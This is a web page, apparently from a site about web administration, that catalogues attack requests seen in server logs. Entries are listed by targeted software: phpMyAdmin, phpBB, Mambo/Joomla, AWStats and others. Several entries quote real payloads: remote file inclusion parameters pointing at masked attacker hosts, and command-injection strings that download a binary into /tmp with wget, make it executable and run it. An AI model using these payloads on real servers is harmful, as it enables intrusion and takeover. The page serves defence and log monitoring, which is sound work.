skip to content

System: WWW Hacker Activity

 Tweet Share0 Tweets

At any given time there are thousands of computers sending out requests designed to compromise a web server or website by exploiting vulnerabilities in various software packages and programming languages. This comes on top of brute-force ssh attacks and other non-HTTP techniques.

The difference between now and earlier years is that many of these computers have actually been compromised themselves and turned into 'zombie' servers controlled by yet another server and so on. The 'controller' of a zombie network may receive notification when a server has been compromised, or the system could be completely automated and designed simply to spread as far as possible.

The following entries will give you an idea of what kind of exploits are about and what to look for in your webserver logs. If you're not running the targeted software packages then you (probably) don't need to be too concerned. You may still want to use mod_rewrite to send a 403 Forbidden or similar response, but that would just be to reduce bandwidth.

If you are running one more more of these packages then make sure you keep up to date with upgrades and patches. Where possible we've included a link to the product homepage and/or security announcements.

Note: This list is by no means comprehensive and should be used for information purposes only.

PHPMyAdmin

Target
PHPMyAdmin
Files Requested
/PMA/main.php
/admin/main.php
/admin/mysql/main.php
/admin/phpmyadmin/main.php
/admin/pma/main.php
/db/main.php
/dbadmin/main.php
/main.php
/myadmin/main.php
/mysql-admin/main.php
/mysql/main.php
/mysqladmin/main.php
/phpMyAdmin-2.2.3/main.php
/phpMyAdmin-2.2.6/main.php
/phpMyAdmin-2.5.1/main.php
/phpMyAdmin-2.5.4/main.php
/phpMyAdmin-2.5.6/main.php
/phpmyadmin/main.php
/phpmyadmin2/main.php
/web/phpMyAdmin/main.php
/PMA/read_dump.php
/db/read_dump.php
/dbadmin/read_dump.phpv /myadmin/read_dump.php
/mysql/read_dump.php
/mysqladmin/read_dump.php
/phpMyAdmin%202.6.4-pl4/read_dump.php
/phpMyAdmin%202.7.0-beta1/read_dump.php
/phpMyAdmin%202.7.0-pl1/read_dump.php
/phpMyAdmin%202.7.0-rc1/read_dump.php
/phpMyAdmin%202.7.0/read_dump.php
/phpMyAdmin-2.2.3/read_dump.php
/phpMyAdmin-2.2.7-pl1/read_dump.php
/phpMyAdmin-2.5.6/read_dump.php
/phpMyAdmin-2.5.7-pl1/read_dump.php
/phpMyAdmin-2.6.0-pl3/read_dump.php
/phpMyAdmin-2.6.0/read_dump.php
/phpMyAdmin-2.6.1-pl3/read_dump.php
/phpMyAdmin-2.6.3-pl1/read_dump.php
/phpMyAdmin-2.6.4/read_dump.php
/phpadmin/read_dump.php
/phpmyadmin/read_dump.php
/phpmyadmin1/read_dump.php
/phpmyadmin2/read_dump.php
/typo3/phpmyadmin/read_dump.php
/web/phpMyAdmin/read_dump.php
/xampp/phpmyadmin/read_dump.php
Payload
None - there's probably a followup scan/attack
Security
http://www.phpmyadmin.net/home_page/security.php

Various PHP applications

Target
Various PHP applications - seems to be an extension of Mambo exploit below, but with more target files
Files Requested
/DE/index2.php
/FR/index2.php
/NL/index2.php
/US/index2.php
/cms/index.php
/cms/index2.php
/cvs/index.php
/cvs/index2.php
/index.php
/index2.php
/mambo/index.php
/mambo/index2.php
/mb/index.php
/mb/index2.php
/site/index2.php
/v1/index2.php
/v2/index2.php
/v3/index2.php
Payload
POST data

phpBB

Target
phpBB
Files Requested
/modules/Forums/admin/admin_styles.php
/Forums/admin/admin_styles.php
/includes/functions.php
/includes/functions_nomoketos_rules.php
/modules/Forums/admin/admin_mass_email.php
/modules/Forums/admin/index.php
Payload
phpbb_root_path=http://XXX.XXX.XX.XX/cmd.dat?
cmd=cd%20/tmp;wget%20XXX.XXX.XX.XX/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|
Security
http://www.phpbb.com/security/

Coppermine

Target
Coppermine
Files Requested
/modules/coppermine/themes/default/theme.php
Payload
THEME_DIR=http://XXX.XXX.XX.XX/cmd.gif?
cmd=cd%20/tmp;wget%20XXX.XXX.XX.XX/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|

Mambo/Joomla Content Management System

Target
Mambo Content Management System
Joomla Content Management System
Files Requested
/index.php
/index2.php
/mambo/index2.php
/cvs/index2.php
/cvs/mambo/index2.php
/php/mambo/index2.php
/cbcms/mod_cbsms_messages.php
/components/com_extcalendar/admin_events.php
/components/com_forum/download.php
/components/com_galleria/galleria.html.php
/components/com_hashcash/server.php
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php
/components/com_loudmounth/includes/abbc/abbc.class.php
/components/com_pcchess/include.pcchess.php
/components/com_pccookbook/pccookbook.php
/components/com_performs/performs.php
/components/com_pollxt/conf.pollxt.php
/components/com_rsgallery2/rsgallery.html.php
/components/com_smf/smf.php
/components/com_simpleboard/file_upload.php
/components/com_sitemap/sitemap.xml.php
/components/com_videodb/core/videodb.class.xml.php
/mod_cbsms_messages.php
Payload
_REQUEST[option]=com_content
_REQUEST[Itemid]=1
GLOBALS=
mosConfig_absolute_path=http://XXX.XXX.XX.XX/cmd.gif?
cmd=cd%20/tmp;wget%20XXX.XXX.XX.XX/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|
CONFIG_EXT[LANGUAGES_DIR]=http://XXX.XXX.XXX/components/com_extcalendar/upload/Thehacker?&cmd=id
phpbb_root_path=http://XXX.XXX.XXX/components/com_extcalendar/upload/Thehacker?&cmd=id
Security
http://forum.mamboserver.com/forumdisplay.php?f=216

Wordpress, Drupal and other PHP applications

Target
Files Requested
/blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/drupal/xmlrpc.php
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php
Payload
POST data
Security
http://www.php.net/

AWStats

Target
AWStats
Files Requested
/awstats/awstats.pl
/cgi-bin/awstats.pl
/cgi-bin/awstats/awstats.pl
Payload
configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20XXX%2eXXX%2eXX%2eXX%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|
Security
http://awstats.sourceforge.net/awstats_security_news.php

Microsoft Applications/Extensions

Target
Microsoft Applications/Extensions (may be benign)
Files Requested
/5c/_vti_bin/owssvr.dll
/5c/MSOffice/cltreq.asp
Payload
UL=1&ACT=4&BUILD=6551&STRMVER=4&CAPREQ=0

Note: The following exploits were ALL attempted on various sites on our server from the same IP address on 29 March 2007 with the User Agent "Morfeus Fucking Scanner" which seems to be some kind of high-powered PHP exploiting robot.

DBImageGallery

Target
DBImageGallery
Files Requested
/admin/attributes.php
/admin/images.php
/admin/scan.php
/includes/attributes.php
/includes/db_utils.php
/includes/images.php
/includes/utils.php
/includes/values.php
Payload
donsimg_base_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
Security
http://www.dbscripts.net/imagegallery/history.php

DBGuestbook

Target
DBGuestbook
Files Requested
/includes/guestbook.php
/includes/utils.php
/includes/views.php
Payload
dbs_base_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

Ultimate Fun Book

Target
Ultimate Fun Book
Files Requested
/board//function.php
/funboard/function.php
/function.php
Payload
gbpfad=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

Back-End.org CMS

Target
Back-End.org CMS
Files Requested
/BE_config.php
Payload
_PSL[classdir]=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

Sinapis Forum CMS

Target
Sinapis Forum CMS
Files Requested
/sinapis.php
/forum//sinapis.php
/FO/sinapis.php
Payload
fuss=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/
Security

Admin Phorum

Target
PhpForums Admin Phorum
Files Requested
/actions/del.php
Payload
include_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

eFiction

Target
eFiction
Files Requested
/bridges/SMF/logout.php
/get_session_vars.php
Payload
path_to_smf=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

PMB Services

Target
PMB Services
Files Requested
/cnl_prod/pmb/opac_css/includes/resa_func.inc.php
/pmb/opac_css/includes/resa_func.inc.php
/opac_css/includes/resa_func.inc.php
Payload
class_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

AgerMenu

Target
AgerMenu
Files Requested
/example/inc/top.inc.php
Payload
rootdir=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

Fast Click

Target
Fast Click
Files Requested
/fclick/show.php
Payload
path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

FCRing

Target
FCRing
Files Requested
/fcring.php
Payload
s_fuss=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

PHP-MIP

Target
PHP-MIP
Files Requested
/php/top.php
/phpmip//top.php
/top.php
Payload
laypath=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

SendStudio

Target
SendStudio
Files Requested
/sendstudio/admin/includes/createemails.inc.php
/sendstudio/admin/includes/send_emails.inc.php
Payload
ROOTDIR=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

Not Yet Classified

/forum/index.php?func=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/ /index.php?func=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/ /index.php?page=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/ /live/help.php?css_path=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/ /modules/My_eGallery/public/displayCategory.php?adminpath=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/ /phorum/common.php?db_file=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/ /skins/advanced/advanced1.php?pluginpath[0]=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/ /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/ /ubbthreads/addpost_newpoll.php?addpoll=preview&thispath=http://XXX.XXX.XX.XXX/~lisir/M.txt?&/

Note: The following exploits were attempted by user agent Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0) - from Russia with love.

/components/com_simpleboard/file_upload.php?sbp=http://XXXXXX.ru/r57.txt? /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://XXXXXX.ru/r57.txt? /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://XXXXXX.ru/r57.txt? /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://XXXXXX.ru/r57.txt? /modules/MambWeather/Savant2/main.php?mosConfig_absolute_path=http://XXXXXX.ru/r57.txt? /components/com_joomlaboard/file_upload.php?sbp=http://XXXXXX.ru/r57.txt?

References

< System

Send a message to The Art of Web:


used only for us to reply, and to display your gravatar.

<- copy the digits from the image into this box

press <Esc> or click outside this box to close

Post your comment or question
top